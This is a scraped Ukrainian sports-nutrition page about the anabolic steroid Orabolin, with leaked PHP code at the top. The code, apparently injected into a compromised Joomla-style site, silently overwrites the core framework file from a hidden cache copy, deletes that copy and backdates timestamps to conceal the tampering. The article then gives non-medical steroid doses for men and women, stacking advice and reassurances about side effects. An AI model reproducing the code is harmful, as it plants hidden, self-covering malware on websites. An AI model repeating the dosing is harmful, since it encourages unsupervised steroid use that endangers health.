$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Ораболін | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Ораболін

ОраболінОраболін - дуже м'який, оральний стероїд, призначений для нарощування сили і м'язової маси. Це головним чином стероїд анаболічної дії, що володіє слабкими андрогеними властивостями. Деякі атлети, які пробували його, були дещо розчаровані його дією. Але в поєднанні з Вінстролом, Параболаном або Мастероном препарат сприяє приросту якісної мускулатури, яка при припиненні прийому стероїдів добре зберігається. Ораболін - препарат, придатний швидше для атлеток. Процеси маскулінізації при дозах до 12-16 мг на день рідкісні і той факт, що препарат - похідна від жіночого статевого гормону, усуває моральні та етичні сумніви в цьому. Оскільки таблетки не алькуліровані по 17-альфа, вони малотоксичні для печінки, ампулована форма практично ніяк на печінку не впливає. І все ж у високих дозах і при тривалому прийомі вони викликають підвищення функціональних показників печінки.

Ораболін мало ароматизований, так що обумовлені естрогенами побічні явища (гінекомастія та інші) виникають рідко. Атлети розповідають про мінімальне скупчення води. Деякі культуристи приймають препарат незадовго до змагань, тому що він трохи підвищує кров'яний тиск і підкреслює мужність, підвищуючи її. Ораболін потребує відносно високих щоденних доз, тому що діюча хімічна речовина, яка входить до його складу, погано сприймається стероїдними рецепторами м'язової клітини. Чоловіки отримують результати, якщо їх доза становить, 20-40 мг на день орального препарату або від 250 мг на тиждень препарату ін'єкційного.
 
Статті СТЕРОЇДИ Ораболін